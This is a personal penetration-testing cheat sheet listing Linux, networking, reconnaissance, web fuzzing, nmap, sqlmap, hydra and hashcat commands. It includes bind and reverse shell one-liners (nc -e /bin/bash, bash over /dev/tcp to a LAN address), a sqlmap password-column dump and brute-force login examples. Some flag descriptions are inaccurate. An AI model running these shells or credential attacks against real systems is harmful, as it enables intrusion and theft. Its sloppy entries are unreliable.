┌──────┴──────┐
│aaPentestinga│
│aaaatoolsaaaa│
└─────────────┘
-
├ adduser user
: adds user, will ask for password, adress, etc.
│ and will set default directory, shell automatically - ├ deluser user : will delete specified user
-
├ useradd : adds a user, but you have to specify things
│-d : specifies the directory in wich the user will be created
│-s : specifies the shell
│useradd -d /opt/admin -s /bin/bash - ├ su user : login as user
- ├ adduser/deluser user : add/delete user from sudo group
-
├ ifconfig : shows informations like ip, netmasl, broadcast...
│ network ip : changes the ip of the network
│ifconfig eth0 10.0.0.1 netmask 10.0.0.1 -
├ /etc/network/interfaces : configuration file, edit to config
│get an automatic ip :
│auto interface
│iface interface inet dhcp
│get an static ip :
│auto interface
│iface eth0 net static
│adress ip
│netmask/broadcast ip -
├ macchanger : changes mac address
│ -r interface : changes interface MAC to a random one
│ -m MAC interface : changes interface MAC to mac
│ -p interface : resets interface MAC to original - ├ service networking restart : restart network service
- ├ /etc/init.d/networking restart : restart network
-
├ route : show routes
│ -n : show gateway ip
│ del/add route : del/add route -
├ netsat : show ports
│ -l : listen ports
│ -t : tcp ports
│ -u : ftp ports
│ -n : show port number instead of the name
│ -p : show port PID -
├ service service start/stop/restart
: starts, stops or restarts a service
│service ssh start -
├ update-rc.d service enable/disable
: enable/disable service
│ to start on boot -
├ locate nameOfArchive
: search an file in the system
│ if a file is created after boot, update db
│updatedb | locate access.log - ├ whereis nameOfArchive : search an file in the system
- ├ find directory -name nameOfArchive : search nameOfArchive in directory
- ├ which nameOfBinary : searchs a binary in the system
-
├ tail/head file
: returns the last/first 10 lines of an archive
│ -f : watch in real time
│ -n int : display int lines instead of 10 -
├ grep something
: searchs someting
│cat /etc/passwd | grep '/bin/bash'
│grep 'bin/bash /etc/passwd
│ > : creates an file with the output
│grep 'bin/bash' /etc/passwd > temBash.txt
│ -v : searchs all that don't match
│grep -v 'bin/bash' /etc/passwd
│ egrep : instead of grep to search more params
│egrep 'nologin|false' /etc/passwd -
├ cut -d delimiter -fnum file
: cuts the file by delimiter,
│ and return the num column
│cut -d : -f1 /etc/passwd
│ -fcolumn 1 ,column 1 : return more than one column
│cut -d : -f1 /etc/passwd -
├ sed 's/toBeReplaced/toReplace' file
: replaces toBeReplaced
│ with toReplace
│ > : creates an file with the output
│sed 's/bash/fish' /etc/passwd > /etc/passwd -
├ uniq : use it with cut or grep, it get's the output
│ and sorts by a flag
│ -c : counts the output
│cat /etc/passwd | grep '/bin/bash' | uniq -c -
├ sort : sorts by a specific flag
│ -n : sorts by number
│ -u : don't show repeated
│ -r : reverses the output -
├ ping ip
: sends ICMP package to ip
│ -c int : sends package int times
│ -t int : Time To Live (TTL) -
├ fping ip
: sends IMCP package to ip
│ -c int : sends package int times
│ -g range : range of ips to scan
│ -a : shows only online hosts
│fping -g 192.168.0.1/24 -a -
├ tcpdump
: traffic analyzer
│ -i interface : specifies interface
│ -v : verbose
│ -w file : write to file
│ -r file : reads file
│ tcp/icmp/... : specifies a protocol
│tcpdump -vi eth0 icmp -w icmp.pcap
│ -n : shows ip
│ -e : shows ethernet protocol
│ -A : ascii
│ -X : hexadecimal
│can use: host ip / src host ip / dst host ip / port port -
├ host dns
: shows ip of dns
│ -t type : type of register, SOA, A, AAAA, NS, MX or PTR
│ -l : lists hosts in a domain, uses AXFR
│ aaaaaaaaa(when the original dns stops working, another is used)
│ -v : verbose -
├ nc url port
: connects with ip in port
│see default service ports in /etc/services
│everything the host do will log, even the ip
│ -v : verbose
│ -l : listen
│ -p port : port port
│ -n : shows ip
│ -u : shows udp ports, the default id tcp
│ -< file : sends file on connection
│ -z host port : scan to see if occupied
│when using with -n, doesn't accept dns, only ip
│ -e file/bin : executes file/bin on connection
│nc -vnlp 5050 -e /bin/bash -
├ ncat
: exactly line nc, but supports encryption
│generate ssl:
│openssl req -x 509 --newkey rsa 2048-keyout chave.pem -out cert.pem -days 10
│ncat -vnlp 443 --ssl-key name.pem --ssl-cert cert.pem -
├ telnet dns port
: connects with dns:port line netcat,
│ but a little more shitty
│telnet ip1 port1 | /bin/bash | telnet ip2 port2
│connects and sends shell to ip1 port1, and outputs to ip2 port2
│OBS: can be the same ip -
├ /dev/tcp
: easily open tcp ports
│echo 'this will be send to the port' > /dev/tcp/192.168.0.200/4545
│bash -i > /dev/tcp/192.168.0.200/4545 0>&1 2>&1
│sends bash to 192.168.0.200:4545 and shows input(0) e error(2) in the output(1) - ├ urlcrazy url : similar disponible urls
-
├ theHarvester
: cli dorking
│ -d dns : specifyes dns
│ -l int : search limit
│ -b searcher : searcher to use, $theHarvester --help to see all
│ -f file.html : write output to file.html - ├ exiftool doc : see metadata of doc
-
├ lynx dns
: cli browser
│ --dump : only outputh the html, no interantion, for making scripts -
├ whois dns
: iana whois, via cli
│ -h url : specifyes a whois searcher,ex: whois.iana.org - ├ bgpview.io/bgp.net : websites info like asn/netblock, if there's a dns
-
├ wafw00f
: web app firewall toolkit (checks for firewall)
│ -v : verbose
│ -r : don't follow redirect (300)
│wafw00f -v testphp.vulnweb.com -
├ whatweb
: discover web thecnologies being used
│ -v : verbose
│ -a int : agressivy, 1, 3 and 4
│whatweb -a 3 http://testphp.vulnweb.com -
├ ffuf : web fuzzer
│ -u url : specifies url
│<url>:FUZZ to sppecify where to brute force
│ -w wordlist : specifies worlist to use
│ -e ext : specifies extension (.php, .html)
│ -recursion : enables recursion├────────────────────────────────────────────────────────────────
-
├ wfuzz : web fuzzer
│ -c : enables colored output
│ -l type,param : what to use in fuzzing
│wfuzz -c -z file,wordlist.txt http://testphp.vulnweb.com?FUZZ=admin.php
│ -hl/hw/hh int : hide line/word/char with int
│ -sl/sw/sh int : only show line/word/char with int -
├ dirb : web dir fuzzer
│ -t : doesn't use a '/' in the end
│ -a user_agent : defines a user-agent
│ -S : silent mode
│ -X ext : specifies extension (.php, .html)
│ -u user:pass : if needed for HTTP login
│dirb http://testphp.vulnweb.com/login -u admin:admin
│ -r : disables recursion
│ -R : interactive recursion, will prompt if you want to
│ -o file : writes output to file
│dirb http://testphp.vulnweb.com /usr/share/dirb/wordlists/common.txt -a "Chrome" -
├ dnsenum : multi purpose dns tool
│ --enum dns : dns to scan
│ -f wordlist : wordlist to sub domain brute force
│ -w : performs whois
│ -r : enables recursion -
├ nmap ip/range : scans entire netword in range
│nmap 192.168.0.0/24
│ -v : verbose
│ -T level : specifies agressivity
│ -n : show ip, don't resolve
│ -O : identifies OS
│ -F : fast scan, 100 most common ports
│ -sn : ping scan
│ -sV : service version
│ -sF : sends FYN flag
│ -sT : sends full TCP protocol
│ -sS : stealthy scan, (SYN scan)
│ -sU : UDP scan
│ -p port : specifies port, a '-' scans all
│ -g dst_port : specifies a destination port
│ -D ip : sets ip as decoy, decoy will
│ aaaaaaaaaaaaaasend the same traffic as you, hardening identification
│ --script script : specifies script to use
│nmap --script vuln 192.168.0.110
│ -SC : use scripts with scan, less noisy alternative to -A
│ --open : show only open ports
│nmap -D RND:20 --open -sS -p- 192.168.0.1 -oN portsH
│ --exclude ip : excludes an ip from scan
│ -iL list : list of hosts to scan
│ -iR int : number of hosts to attack
│aaaaaaaaaaaaaaaaasimutaniously with, bypas afirewall
│ -PN port : don't ping beore sending package, exclude
│aaaaaaaaaaaaaaaaaaparameter to apply to all, bypass firewall
│ -PU port : send UDP package, exclude parameter
│aaaaaaaaaaaaaaaaaato apply to all, bypass firewall
│ -oN file : writes to file
│ -oX file : writes to file in xml format -
├ sqlmap
: sql injection and info
│ -v : verbose
│ -u url : specifies url
│ --current-db : grabs current db in production
│ --threads int : specifies how many threads to use
│sqlmap -u "store.com/prod.php?prod=844" --current-db
│OBS: needs to be an entry point
│ -dbs : grabs all dbs
│ -D db_name : specifies db to get info
│ --tables : grabs tables of specified db
│sqlmap -u "store.com/prod.php?prod=844" -D store --tables
│ -T table : specifies table to get info
│ --columns : grabs columns of specifies table
│sqlmap -u "store.com/prod.php?prod=844" -D store -T users --columns
│ -C column : specifies column to get info
│ --dump : grabs text of specifies table
│sqlmap -u "store.com/prod.php?prod=844" -D store -T users -C 'name,email,password' --dump -
├ hash-dentifier : identify hashes
│hash-identifier -
├ crunch : custom wordlist generator
│crunch 9 9 -f charset.lst numeric -t admin@@@@
│crunch <min chars / max chars>
│/etc/crunch/carset.lst contains characers
│the @ specifies where to user the characters -
├ hydra : password cracker
│ -l user : user to try login on
│ -L wordlist : wordlist of users to try login on
│ -p password : password to try login on
│ -P wordlist : specifies wordlist to brute-force as password
│ -s port : specifies port
│ -m param : modules like http-get, http-get-form etc. require params
│hydra -l admin -P passlist.txt http-head://testphp.vulnweb.com -m /basic.php
│hydra -l admin -P passlist.txt http-get-form://testphp.vulnweb.com
│ aaa-m "/login.php:user=^USER^&password=^PASS^:Couldn't login"
│OBS: to filter by successfull login message: S=Welcome
│hydra -l admin -P passlist.txt http-post-form://testphp.vulnweb.com
│ aaa-m "/login.php:user=^USER^&password=^PASS^:Couldn't login" -
├ hashcat : hashed password cracker
│ -a int : type of attack, [0-straight, 1-combination, 3-brute force,
│ aaaaaaaaa6-hybrid wordlist + mask, 7-hybrid mask + wordlist]
│ -m type : type of hash, see the hascat man to see all
│ -o filename : specifies filename ti write output in
│hashcat -a 0 -m 1000 - o cracked.txt "HASHEDPASSHERE" wordlist.txt
│hashcat -a 0 -m 1800 - o cracked.txt hashes.txt wordlist.txt -
├ iptables : linux firewall
│ -L : list rules of a table, default is filter
│iptables -L
│iptables -L -t nat
│ -t table_type : specifies table type [filter, nat or mangle]
│ -d ipv4 : dst host
│ -s ipv4 : src host
│ -p protocol : protocol to apply rule [tcp, udp or icmp]
│ -sport src_port : src port
│ -dport dst_port : dst port
│ -o src_interface : src interface
│ -i dst_interface : dst interface
│ -s ipv4 : src host
│ ! : negation to the following rule, as not in programming languages
│ -j action : action to be executed when rule is true
│ACCEPT: accepts
│DROP: blocks package, doesn't throw an error
│REJECT: blocks package, throws an error
│DNAT: redirects package to a specified ip via --to
│REDIRECT: redirects package to a specified port via --to
│MASQUERADE: masks ipv4
│ -A rule : adds rule
│iptables -A OUTPUT -d 192.168.0.103 -j DROP
│iptables -A INPUT -p icmp -s 192.168.0.100 -j REJECT
│ -D rule : deletes rule
│ -F : deletes all rules
│ -P option : modifies behavior of a chain of rules [ACCEPT or DROP] -
├ nikto : nikto -host http://testphp.vulnweb.com
│ -ofile : writes output to file -
├ wpscan : wordpress vuln scan
│ --urlurl : specifies url to scan
│ --enumeratep/t/u/tt : gets plugins/themes/users/timthumbs - ├ skipfish : skipfish -o path/to/output/folder/ http://testphp.vulnweb.com
- ├ wapiti : wapiti http://testphp.vulnweb.com -o path/to/output/folder/
┌───────────────────────────────────────────────────────────────
├ Blog└───────────────────────────────────────────────────────────────
┌───────┐
│Users
│├───────┘
│
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
│
│
│┌─────────┐
├┤Network
││└─────────┘
│
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
│
│
│ ┌──────────┐
├─┤Services
││ └──────────┘
│
├────────────────────────────────────────────────────────────────
│
│
│ a┌──────────┐
├──┤Archives
││ a└──────────┘
│
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
│
│
│ aa┌─────────┐
├───┤Traffic
││ aa└─────────┘
│
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
│
│
│ aaa┌──────────────────┐
├────┤Info. gathering
││ aaa└──────────────────┘
│
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
│
│
│ aaaa┌──────────┐
├─────┤Cracking
││ aaaa└──────────┘
│
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
│
│
│ aaaaa┌─────────┐
├──────┤Defense
││ aaaaa└─────────┘
│
│
│
│ aaaaaa┌──────────┐
├───────┤Scanners
││ aaaaaa└──────────┘
│
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
├────────────────────────────────────────────────────────────────
Creator: gabi schstr